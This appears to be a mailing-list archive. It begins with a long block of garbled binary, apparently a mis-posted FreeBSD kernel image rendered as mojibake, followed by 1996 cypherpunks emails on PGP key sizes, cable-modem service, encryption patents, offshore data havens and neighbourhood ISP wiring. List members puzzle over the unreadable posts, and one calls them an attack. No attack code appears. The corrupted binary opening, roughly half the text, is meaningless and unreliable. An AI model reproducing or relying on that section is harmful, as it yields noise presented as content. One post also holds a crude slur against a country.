‹K‰Mü‹SQ<‰Uø‹w¶O	IÁà)È‹...´ðð...Àt
=Ðÿðt
=

h[¸ðèœ5úÿjÿuøVÿÐPèNB
‹‹A‰Bë‹A£Ôzð‹Q‹‰fÇA&fÇA2
Ç@
Ç@
ÿKÿCë6ƒ{


äð1ÀëJ=
äðÿ
hç3/4ðè.úÿÇ`žð
Ç`žð
hç3/4ðèw-úÿÇ`žð
Ç`žð
9DžuƒÂÇDžÿÿÿÿë$D
ÿPQÿuèêýÿÿ‹Lžº
ÿPQÿuè­ýÿÿƒÄ
‹Eü£

Ç@íð

‹‹F‰Bë‹F£lžð‹V‹‰€cýë9ƒ>
è1/2

èá

ÇEì


Ç@íð
èMîÿÿé[ÿÿÿ‹UÇ²
‹(tm)‰EfÿHC9]Þ1Û9]~‹Uƒ<š
è
‹Eð‹˜‰E€fÿHC9]³‹w
hÐ
ÇEè
‹‹C‰Bë‹C£D¯ð‹S‹‰ë'‰5




ƒ}Ì
ÇEŒ
ƒ}Œ...Ö
hãðèHúÿ‰uœ9]Ø"È
Vèo
VWÿuè5
þÿÿƒÄ...Àtƒ}ô
ë-‹Mà‹U ‰
‰ðë‹U Ç
hµûðèøðùÿ1öjj‰óÁã
‰ØEüP‹Møÿ1èãà
hà(tm)ðè´·ùÿeø[^ÉÃ



Ç0Uð
h"
ðèÜßùÿ‰Øeô[^_ÉÃ
¸
‹A‰B‹‰P‹B‰ƒÄöAt
ÿrè-ûÿÿë
ÿrè%
¸
SVèÄÿÿÿƒÄÿND‹S‹‰‹‹C‰B‹C
+C)FHöCt
ÿsè"òÿÿë
ÿsèt


1ÀeÄ[^_ÉÃU‰å‹E
ö@t‹@ƒÀPè`'ÿÿƒÄ‹EƒÀPèQ'ÿÿÉÃ
hà(tm)ðè...ŽùÿÉÃ
yÿ...²
u‹]ð‹s ƒ~8tƒ~8t¸
¸
÷Áÿ
ƒøt	ë1Àë
¸
¸#
...Û"-üÿÿëƒûtƒûu¸


ûÿƒÄ(ÇEø˜µð‰]ü‹˜µð‹CV‹ÿÐë8öC&t
h=;ðèh´ùÿƒÄ€c&ïöC& t
c&ßSè(tm)|ùÿƒÄSèh"
€g0¿Wè=uùÿeô[^_ÉÃcpylck

fƒø...-
fƒø..."

€a0¿Qèiiùÿeô[^_ÉÃ
Çläð
q‰pÇA
‹Q‹A‰B‹Q‹A‰‹AÿH4€a&¿ÉÃ
‹Q‹A‰B‹Q‹A‰‹AÿH4€a&¿öA&@t
htTðè±-ùÿ‰Y‰y‰øÁè
Ø#ÀfðÁàdžðÇA
q‰pÇA
‹‹A‰Bë‹A£hÒð‹Q‹‰ÿ
ˆäð€a&ýÉÃ¨t,ƒ9
‹‹A‰Bë‹A£"âð‹A‹‰ÿ
"äðfa&ÿ¿¡"äð€äð9täðv*ƒ=ôfð
ƒútº

‹S‹C‰B‹S‹C‰‹CÿH4€c&¿ÿ
"äðé†
htTðèœ"ùÿ‰s‹}
‰{‰øÁè
ð#ÀfðÁàdžðÇC
9Uv...Uèt	F95päðwÐ95päðtv†‹}‹Mð| ‰ø9Es%‹Mü‰

]
htTðèÜùÿ‹}è‰{‰CÁè
ø#ÀfðÁàdžðÇC

‹S‹C‰B‹S‹C‰CÿH4c&¿*C&(c)@
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹‹C‰Bë‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
¸ÿ
ºÿ


‹Mfƒy(

‹‹C‰Bë‹C£hÒð‹S‹‰Ç

‹C£hÒð‹S‹‰Ç
‹C£hÒð‹S‹‰Ç
¡¤äðƒÀÂ‰ äð‰ÐƒÀ£täð¡|äð@täð£xäð¡täð|äð=päð
h~ðèünùÿeø[^ÉÃ
‹àíð...Òu1ÀÉÃQ%ÿ
h¸ðè€nùÿ‹BR‹@ÿÐÉÃ
h$ðèmùÿ‹Bÿu
R‹@ÿÐÉÃ
¸
ƒøt5ë;‹F<‹P
¶@
9Œðð
"
"
+ùÿƒÄö
uæ€ëöF0tj
Sè""ÿÿƒÄƒ8u
‹Eü÷ÐÁèë¸
¸


h>"ðè Xùÿƒ}Ì




‹uÇž
ÇŒ›ðŒWðƒ=Œ›ð


u¡|Uðj
ÿp‹@ÿÐƒÄ¡|UðSÿp‹@ÿÐ‹]üÉÃ%r
>
é°
ìþpþðé¹



$ïˆ

·ÃƒÁƒÆþyóƒ}ü
hpºðèU4ùÿƒþÿu
‰ú¶ÂÃ·Ó‰ØÁèûÿÿ







PRhÄ1/4ðèm2ùÿƒÄƒ=Tð
PRha1/2ðè².ùÿèm6úÿè1/4ÿÿèÚÿÿƒÄ
ƒ=Lð


  Features=0x%b

=
ëh¨Ãðë
h¬Ãðëh°ÃðèŽ*ùÿƒÄh¸Ãðè*ùÿƒÄ€=4°ð
‹†à
WèJÞøÿ¸
‹G$ƒ 
syncing disks... 








dumping to dev %lx, offset %ld







ëlƒøtWëeƒ=¬Òð



~ßÇPðÿû

èýÿÿj
¸

ÇA,-
‰ÐAL9Eø}.‹]ø9YLu
A4A81ÀëHUø+QL...Ò
ÇA,
ƒ}è
jJÿuüè³¡øÿ‹EèeÜ[^_ÉÃU‰å‹E
‹U¶
ƒ<

ùÿÿ5âðèE}ÿÿÿ5âðèšpÿÿ¡âðÿp è9
u
Sè
ÉÃget_pv_entry: cannot get a pv_entry_t
hŒåðè
¸
...Ét‹‰‹A‰B‹A‰Bë0ÇB
...Ét/9qu9YtÊ	...Éuî...Ét‹‰ÿÀ_ð¡

‰Ù1Àüó¯t@...ÀtœƒÇü‰ú+UøÁú‰ÖÁæ
ÿEð¶Eü‹...h¯ðþÿïûïw

þÿÿ¿ïv
ƒ'ù	
Æ

hÄîðèüþøÿ‰ðÁè‹M‹ƒ<‚
ƒ?
¡ð^ðƒ8


ƒ~
_^ÃVW‹t$
‹|$‹T$BüJt
¬ªÀu÷J1Àë¸?
_^Ã1/4D$t@Ã1ÀÃWV‹|$
‹t$‹T$1À‰ÑÁéüó§u	‰Ñƒáó¦t@^_Ã‹D$ë¸
h#
ðèÈãøÿfƒ¸ä
h/
ðèãøÿR‹‹P‰Q‹H‹‰Z¹DËðÁâÑ;	t
Áê"ˆðÇ@
h8
ðèÂâøÿR‹‹P‰Q‹H‹‰Z¹ŒâðÁâÑ;	t
Áê"ŒðÇ@
h)
ðètâøÿR‹‹P‰Q‹H‹‰Z¹È"ðÁâÑ;	t
Áê""ðÇ@
ƒÁpQè9Ö

¹ðé&



Fatal trap %d: %s while in %s mode










þŽ°
¸
‹I‰MÌë‹Žà
¸
‹› 
i
‹› 
‹€ 
Ç‚
Ç‚
Ç‚
Ç‚
Ç‚
Ç€Œ
Ç€Œ
u&‰Ø9]}‹EPVÿu
ÿuèÿÿÿÿE
Ot-1ÛƒÄëC€<3
)ð(ÿÿÿSèBËøÿj
Sè-ýÿÿƒÄë¡)ð...(ÿÿÿ¡)ð...,ÿÿÿ...(ÿÿÿP...8ÿÿÿP...HÿÿÿP...\ÿÿÿP¸)ðƒ}
èÿÿÿÉÃ!bActive!n-!bDrivers
)ðRÿuàèëÂøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè"Âøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè×Áøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàèÁøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè'Áøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè×Àøÿjÿÿuàÿu
‹Uƒ}
"›
ƒøXtié<þÿÿƒøctgé2þÿÿƒøtK
ƒøxtLéþÿÿ=W

‡h
ÇƒŒ
è
úÿÿ‰ÇƒÄGÿƒø
‡€
ÇƒŒ
...Àt7é5üÿÿƒø...+üÿÿèNëÿÿé!üÿÿjÿ5èðè¯àÿÿj
FreeBSD Kernel Configuration Utility - Version 1.0
 Type "help" for help or "visual" to go to the visual
 configuration interface (requires MGA/VGA display or
 serial terminal capable of displaying ANSI graphics).







1Àéò
CB€;
€; t€;	ußÆD*À
E1/4PSèž






















)ðE¹PèÜ(c)øÿƒÄ$·C
...Àt1/4À@HPh¢1ðEÄPè1/2(c)øÿ¿C
Ph¢1ðEÊPèª(c)øÿÿsh
)ðEÐPè(tm)(c)øÿƒÄ$ÿsh¢1ðEØPè...(c)øÿÿsh¢1ðEáPèt(c)øÿÿs h
)ðEçPèc(c)øÿƒÄ$¸GLðƒ{4
ƒÃ@ƒ;
ƒû
tƒû
uÆ

ÇEø

‹EðƒÀÉëEðÀøw=EðÀ(c)Eð9}ð}/...ö|9Mür
u‹Uô9Uð~3/4ÿÿÿÿë
3/4
h-Sðèðšøÿ‹OD‰Mü‹w@æ
h|TðèÈ(tm)øÿ‹^@ã

¸ÿÿÿÿë‰
PVð‰5TVðÆµð1Àeø[^ÉÃU‰å€=¶ð


è9¨ÿÿƒÄ"À|ò1ÿj	èÝþÿÿ˜l


æpˆÐæq°
æp°æqj
è¤ÿÿ‰ÂƒÄ...Òth´_ðRhþ_ðè9øÿƒÄ
j
Æ´ð)Š´ð°
æpˆÐæqÉÃ





MàÐ1Ò÷ñ...Òt‹M
‹	±
MàÐ1Ò÷ñ...Òt‹M
‹I±






ƒ{




C9û|¿1Àe¸[^_ÉÃSense Drive Status failed














ÇEð
Wjjÿuìèeøÿÿhà"
Wjjÿuìè"øÿÿÄ...Àuhà"
u
ÿ0è





h%{ðë0¿ †










²÷ÿƒÄƒ~
‡



öF(...•üÿÿ‹F$%À
ƒ~Ž÷þÿÿ‹F$%À





Eð‰ÚîY‰ÚìˆÁ€áˆÈîÆ†¯
·-ª
·-ª

ƒùt]ë‰ƒù@t#ù€
ÆƒÎ
1Àé;

Phó£ðë¶(c)

0ÀîQ
îQ
° îQ
°îQŠƒâ

Ç†€
·-ª


"

·-ª
·-ª
SRè(c)(úÿƒÄ‰Eøƒ}ø4u0SVè
ÇEø

ÿÿÇ

ŠEø‰Êîf‹MøfÁé‹}ðƒÇ
ˆÈ‰úî‹MðƒÁ‰ð‰ÊîfÁè‹uðƒÆ	‰òî°
‹Uðî€"°
ŠEðîf‹UðfÁêˆUü‹MøƒÁ
ŠEü‰Êî‹MøƒÁŠE‰Êîf‹MfÁé‹uøƒÆ	ˆÈ‰òî°‹Uøî€¿°

ŠEÜ‰Êîf‹MÜfÁéw
ˆÈ‰òîOˆØ‰ÊîfÁëO	ˆØ‰Êî°‰úî‹M€¹°



/øÿƒÄh#ºðèý.øÿ€MüÿuüSèÔùÿÿƒÄ
...À...
¸
æ °Âæ °æ °(æ¡°æ¡°æ¡°ÿæ¡°
æ ‹]üÉÃisa_dmacascade: impossible request
ÉÃ€âˆÑ€ÉÀˆÈæÖˆÐæÔÉÃisa_dmastart: impossible request
é§
‰ð$
Dë‰ð$
HæÖ0ÀæØµðÿÿÿ‰Uü‰ÑÁÀ
NMI ISA %x, EISA %x



‰Møƒûw
ƒûtƒþ
v
¸
èåŒÿÿ‰òì"Eø¶ÈƒÄ¶Eü9ÁtKuâ¶Eü9Á"À%ÿ
ÇEü

fƒ¹Ôð
€f÷Vèç÷ÿeø[^ÉÃlpclose
QèD
öFt€Neø[^ÉÃinterrupt-driven



"

ì4¸$ø8EètI""
‰
Ø^ðë
¡Ü^ð‰H‰
Ü^ðÿà^ð¡(







EôPèêÿÿ‹U‹R‰UìƒÄú°ÿæ!ƒÂ‰Uè°€î°
‹Uìî‰×G0À‰úî°‹Uèîh,E

1Àé3/4
ŠC
ˆC
ÿC‹Eô€
€}ü

fƒ""
¸
Ç`ýð

$
‹uÐÆÔ
‹}ÐŠO€á¿ˆO‹]ÌƒÃˆÈ‰Úîé(
j‹Uÿ2ÿuÐèÕ

B‰Uø¨-t(¨tÉ
¸
ÇEü
ë*ƒûtë#ŠA$‰òÐë‰ð
Aë‰ðöÐ"AˆA‹Qlîû1Àeø[^ÉÃU‰åƒìVSj



‹ƒàƒøu&÷B
ˆ


è‹Oÿÿä`ƒÄëìèCL
èqOÿÿä`ˆÁƒÄ€ùút€ùît€ùþt	CûŸ†
è5OÿÿƒÄäd¨tðj
è%Oÿÿä`¶ÐˆÁƒÄ€ùútÚ€ùªt
RhÊ	ðè:æ÷ÿ¸

ðèä÷ÿƒÄ€=d3ð
ðë"hË
ðë=`3ð´
ðëhâ
ðèÊã÷ÿƒÄÿ5X3ðjhê
ðèµã÷ÿ1Àeô[^_ÉÃ
...Àt"é
c
À"H
K






f‹Cf‰G‹C@%

›þÿéÒöÿÿŠ"Ét
€ùté-ýÿÿ€KH é¸öÿÿ9,²ðu)ƒ{H u#Æi3ð
¸



Æ\3ð
ƒøMtQé­

...öté.
...ötéF

‰Gé"
ƒ%X3ðýöG(t
€
X3ðë7ƒ%X3ðûé­
‰Y‹ÀYð‰r¡ÀYð£,²ð¹

ƒú8tié¥
QèÞ¹þÿ‹5,²ð‹F
À‰Eô†
‡M

Æi3ð

è#ÿÿƒÄKƒûÿuê‹]üÉÃ
èãÿÿä`¶ÐƒÄúú
ºÅ

‹UôîAƒù~Þ‹`3ðƒÂì1ÉˆÈºÀ
¸

ðë‹EäÈŠ"1
ð‹]ˆA9MøÌGÿÿ
ÆT4ð
¶†î









1Àéé




öG"z
ƒÄ
‹Uø€z	F‹MIÁàÇ€|Zð
...À"Æ
"ž
€Oéù
tO‹UR‚Áà"HZðÿD8ƒ|8
ÇD4
$X<Xth€qðQÿuôèÓ
hÇwðë'ÆC	1Àé(tm)
u
Sè

t	Sèî
MˆÈîSŠMþÁˆÈîSŠEîh'





¸
¸ÿÿÿÿÉÃ‹@Zð...Àth"ðh€vðœ

¸
...³ýÿÿ‹]ôèWþÿ...À...¯ýÿÿƒ}ø


P3/4CPh±...ðè-j÷ÿeø[^ÉÃU‰åVS‹]‹M
3/4SR‚ÁàÇ€|Zð
¸
€z	~ÆB	Aƒù~Ùh ¡

<...¸\ð
"É|öÁt
WìˆF
ŠEü È8Eüu
‰Èƒàë"û'
BAŠˆ"Àuö‰Ø‹]üÉÃ
uB9Âr÷)ÐÉÃ
P¶E	P¶EPh°ðh1/4\ðèÞi÷ÿ¸1/4\ðÉÃ
¿




¶ðø¶ð$·ðP·ð|·ð
	The Regents of the University of California.  All rights reserved.


ð¡zð›zð'zð‹zð†zðzðyzðuzðozðgzð_zðUzðLzðEzð;zð1zð'zð#zðzðzðzðýyðõyðìyðãyðÙyðÔyðÊyðÄyð¿yð·yð"yð¢yð(tm)yðyð"yðyyðmyðayðYyðNyðByð9yð-yð)yðyðyðyð÷xðëxðßxðÔxðÈxð1/2xð






		
 @			

		!






		
		

 !@€

÷ððÜÿðhðôTðÐÿð

ller

Soundblaster, SBPro, SB16, ProAudio Spectrum










jJ



**

3

[k
ð 

	





    cosmos@sponsor.octet.com:/usr/src/sys/compile/SPONSOR


@îð~
	
ðˆ	





















ð

ð€



ðŽ"
*
+
2
3
$Pð";
ðÂ;
?
B
G
ð-H
ðKN
ðOU
ðúV
ðâZ
_
c
d
ðth
ð h
ðÃi
j
¹ð÷p
t
ðÃx
ðy
z
Dðâ
†

ðS
ðW•
ð\•
ðj•
ðq•
ðx•

¤¤
indoverlap
sc
cksum
lose
_vop_pathconf_vp_offsets
nfs_mmap
ad
lpg1

_spec_print
getlock

ab_tty
_kstack
nit
xec_check_permissions
d
p_pager_free_swap
winactive
te_in_progress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jan 1996 08:53:47 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: 2047 bit keys in PGP
Message-ID: <m0tXzYj-00098fC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 1/4/96 -0800, you wrote:

>All that being said, I believe that 128 bits is sufficient for a
>symmetric key and 2048 for a public key.  Our paranoia would be far
>better directed at as yet unknown attacks on the algoritms involved
>or the specific implementations of cryptographic systems.  Paul Kocher's
>recent timing attack is a perfect example of what we should be afraid
>of.

Exactly!   I agree.  There is plenty of work that can be directed towards
the hardware arena, for example.  Better filters (AC, telephone, keyboard
cable), untamperable hardware (keyboards come to mind, for instance:  Design
one whose RF "signature" can't be read remotely), a push towards the use of
thin-film-type displays that don't radiate (much) in the RF spectrum,
automatic over-write of unused data areas in hard/floppy disks (including
the (unallocated) space at the ends of files), etc. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 5 Jan 1996 05:36:48 +0800
To: cypherpunks@toad.com
Subject: @Home cable modem systems
Message-ID: <Pine.SUN.3.91.960104155911.13494H-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



See URL http://www.home.net/home2/speed.html

Some tidbits:

       @Home is a high-speed
       network that provides real-time multimedia news,
       information, entertainment and advertising content, access
       to the Internet, e-mail and other services to consumers via
       cable systems and their personal computers. The Mountain
       View, Calif.-based company is a joint venture between
       (between Tele-Communications Inc. and Kleiner Perkins
       Caufield & Byers )venture capital firm.

       The @Home network will provide consumers with a
       significant increase in speed and quality over current online
       connections. The service will use a customized version of
       the popular Netscape browser that will run on most
       Microsoft Windows, Windows 95, Macintosh OS and
       UNIX personal computers. @Home will employ an open
       platform architecture that will make its features available to
       the widest possible number of users and content providers.
       The @Home network will operate over a high-speed
       backbone and existing cable systems and will be linked to
       home computers via cablemodems and standard Ethernet
       connections.

       @Home will include a wide variety of content. In addition
       to providing connections to the global Internet, the World
       Wide Web and e-mail, the service will enable content
       providers to create multimedia content that takes
       advantage of the high-speed network, as well as extensive
       local news and information.

       Deployment of the @Home service will begin in 1996 in
       select national markets, starting with Sunnyvale, Calif. The
       monthly charge for @Home is expected to be $30-$50 for
       unlimited use of basic services.

	...

       Cable modems are almost 700 times faster than 14.4
       modems and nearly 80 times faster than ISDN
       connections. Cable modems do not require an extra phone
       line, and they eliminate the time and potential trouble
       involved in dialing a service. Cable-based Internet
       services offer an even richer multimedia experience than
       CD-ROM technology, including real-time delivery and
       updating of content. And cable offers a direct connection to
       the online world--when you turn on the computer, you are
       on the network.

       @Home's network is based on a distributed model that
       makes extensive use of caching and replication to minimize
       traffic on the system's backbone and maintain high levels of
       speed. @Home will operate its own global network
       infrastructure connecting to the Internet at multiple
       locations. The @Home backbone will connect regional
       data centers together via a multi-megabit switched data
       system. These regional centers would serve limited
       geographic areas, such as individual cities, and would be
       connected to local servers located at cable system
       headends. @Home users would be connected to the
       headends via local area networks operating over the cable
       system, which is a two-way hybrid fiber-optic/coaxial
       cable configured asymmetrically. Many cable companies
       have upgraded their systems to handle such two-way
       connections or are in the process of doing so.

       At the home, the service would arrive over the same cable
       that delivers television signals, which would not be affected
       by the addition of data services. The cable modem, which
       would be supplied by the cable company, would be
       connected to the subscriber's computer with a standard
       10-Base-T Ethernet cable. Many computers now include
       Ethernet connections or can easily be upgraded. The
       software required to use the service would be provided to
       the subscriber by @Home and will include a TCP/IP stack
       and Internet browser software with built-in e-mail and
       multimedia capabilities.


       
       




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cedric Tefft <CedricT@datastorm.com>
Date: Fri, 5 Jan 1996 06:36:31 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: 2047 bit keys in PGP
Message-ID: <30EC6B75@ms-mail.datastorm.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: Scott Brickner
> To: Cedric Tefft
> Subject: Re: 2047 bit keys in PGP
> Date: Thursday, January 04, 1996 3:41PM
>
> Return-Path: <sjb@universe.digex.net>
> Message-Id: <199601042141.QAA15905@universe.digex.net>
> X-Authentication-Warning: universe.digex.net: Host localhost didn't use 
HELO
>     protocol
> To: Cedric Tefft <CedricT@bart.datastorm.com>
> Subject: Re: 2047 bit keys in PGP
> In-Reply-To: (Your message of Thu, 04 Jan 1996 14:12:00 PST.)
>     <30EC5109@ms-mail.datastorm.com>
> Date: Thu, 04 Jan 1996 15:41:51 -0600
> From: Scott Brickner <sjb@universe.digex.net>
> 
 ----------------------------------------------------------------------------  
 --
> Cedric Tefft writes:
> > If his algorithm effectively cuts my keyspace in half, I need to make it 

> >twice as large as I would need if my attacker's best algorithm were brute 

> >force.
>
> Um.  No.  If his algorithm cuts the keyspace in half, you only need to
> make it one bit larger.
>
You are correct.  I'm afraid I was thinking one thing and typing another.

What I meant to say is that the attacker has an algorithm that effectively 
cuts my keySIZE (instead of keyspace) in half,  i.e. his algorithm requires 
him to try on average only 2^1023 keys (instead of 2^2047 for a brute force 
attack) to crack my key of 2048 bits.

Thanks for pointing this out.

"Who needs encryption when their thoughts are unclear in plaintext?"

 - Cedric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Fri, 5 Jan 1996 07:17:33 +0800
To: FreeBSD user <fb@sponsor.octet.com>
Subject: Re: hi peter!
In-Reply-To: <199601041557.PAA09665@sponsor.octet.com>
Message-ID: <9601042207.AA32619@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



Is it my imagination or is someone posting a FreeBSD kernel configuration
binary to the list?


fb@sponsor.octet.com said:
> 
>     cosmos@sponsor.octet.com:/usr/src/sys/compile/SPONSOR
> 

fb@sponsor.octet.com said:
> FreeBSD Kernel Configuration Utility - Version 1.0  Type "help" for 
> help or "visual" to go to the visual  configuration interface 
> (requires MGA/VGA display or  serial terminal capable of displaying 
> ANSI graphics). 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Fri, 5 Jan 1996 07:18:21 +0800
To: cypherpunks@toad.com
Subject: FreeBSD user <fb@sponsor.octet.com>
In-Reply-To: <199601041557.PAA09665@sponsor.octet.com>
Message-ID: <5568er602z.fsf_-_@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain



	Am I the only one who has received three unreadable
messages from this address on cypherpunks?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100 fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 5 Jan 1996 10:01:19 +0800
To: cypherpunks@toad.com
Subject: Re: \"Concryption\"
Message-ID: <v03004202ad12314dc191@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie (anonymous@freezone.remailer) said:
>Does anyone understand what this "Concryption" really is? Reading the
>press blurbs, it could be nothing more than simply compressing the
>stream before encrypting it. A patent on that idea would be rather
>awkward.
>
I doubt that it could be awkward, given that my employer, Aladdin Systems,
has been shipping a software package that implements this since 1986. :-)


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Fri, 5 Jan 1996 02:53:00 +0800
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
Message-ID: <Pine.3.89.9601041723.A21008-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On 4 Jan 1996, Ian Goldberg wrote:

> in a brute-force search.  From Applied Crypto, 2nd ed, pp157-158,
> setting or clearing one bit takes at _least_ 4.4*10^-16 erg of energy.

I thought reversible computing could use an arbitarily small amount of 
energy in computations ? Or is it that you can use it to get down to this 
level of energy loss, but not below ? I'm not sure.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lou Zirko" <Lou.Zirko@rex.isdn.net>
Date: Fri, 5 Jan 1996 08:38:19 +0800
To: cypherpunks@toad.com
Subject: Re: FreeBSD user <fb@sponsor.octet.com>
Message-ID: <m0tXzcY-0008zsC@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


No, got three myself.  The third did seem a little different from the 
first two though, but I didn't study them that closely.

]> 
> 	Am I the only one who has received three unreadable
> messages from this address on cypherpunks?
> 
> -- 
> #include <disclaimer.h>				/* Sten Drescher */
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBLJocAAAEEAMlDzYJPYq0pvfMuSiKU0Y65L2nJql+qEJHYGjO5Pys4prDw
YW1ooPWaqrPQAy/eyqrM7I9KNFDCtmaPxtgcPw2oEDfc/w6cPkrVzvovKLfHQvtg
V/hHUekptSf6j525omrVAoM9MxVL3sEGCjn9VrTeC3h9upkfntHOJeL88i2NAAUR
tB5Mb3UgWmlya28gPHppcmtvbEBkYXRhdGVrLmNvbT4=
=Qlxm
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 5 Jan 1996 01:42:27 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601041707.SAA20110@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"L. Malthus" wrote:

> I was told that Belize is offering passports for the next 
> two years for $50,000 and that might be even less if offers 
> were made to the government to provide low cost Internet 
> access to the citizens of Belize.
> 
> http://www.belize.com/citzdoc.html
> 
> Belize has always been known as a home for pirates, A 
> wonderful Cypherpunk candidate for an offshore data haven!

Belize is a shit hole that is as willing as many other slimeball 
countries to deny someone entry and force them kicking and 
screaming onto the next flight to the U.S. on request from 
U.S. authorities. In principle, that is kidnaping. They use the 
technicality that the person never entered their territory. No- 
man's lands of port zones where the most basic rights may be 
violated without regard to a country's constitution are another 
class of abuse that will have to go.

Belize is also the place where Bob White, publisher of The Duck 
Book and sponsor of some of the largest hard-money conferences 
ever held, was murdered.  The usual suspects were not even 
rounded up.

Someone once wrote that the principle cash crop of Belize is lice. In reality it may be principles. At least the Hondurans 
got angry when a citizen was kidnaped by the U.S.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOt2E0jw99YhtpnhAQHa7gH/Z4cjIcT50+0lxJTF7lHCfcPvSPzXW5BU
Yuea9C5s+1KgNDUYDe2ItTfOf3TTb+2deJGbDgf2TEP+A/q5S+9JHw==
=H46M
-----END PGP SIGNATURE-----










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 5 Jan 1996 09:36:13 +0800
To: cypherpunks@toad.com
Subject: Re:  FreeBSD user <fb@sponsor.octet.com>
In-Reply-To: <9601050000.AA09148@rpcp.mit.edu>
Message-ID: <9601050011.AA17233@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Joseph M. Reagle, Jr. writes:
 > I consider it to be an attack.

He's either a live nutcase, newbie of the year, or a no-life out
trolling.  I strongly recommend against sending him/it mail, helpful
or hateful.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 5 Jan 1996 02:46:40 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601041732.SAA20749@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 2 Jan 96 at 16:32, Jeff Simmons wrote:

> Jim Bell writes:
> 
> >At some point, individual urban and suburban blocks could 
> >easily be "guerilla re-wired" for ISP access without serious 
> >trenching, etc. The phoneco would still be involved, but in 
> >a far lower-profit mode, as the supplier of a single T1 to a 
> >multi-block area. 
> 
> That's assuming the phoneco cooperates.

Why shouldn't they?

What does a hotel do, if not act as a local communication
concentrator for guests? What about multi-company PBX
installations? Most PBX's have for years supported the
facility to handle entirely separate groups of trunks, often
called "tenants." This facility is used in shared-receptionist,
shared-PBX scenarios. Each incoming trunk call identifies the
"tenant" or company to which the call is addressed, so the
receptionist may answer appropriately. I even seem to vaguely
remember hearing of apartments or co-ops that use a PBX
instead of having direct subscriber lines to each apartment. 

Aggregation of communication facilities within the boundaries
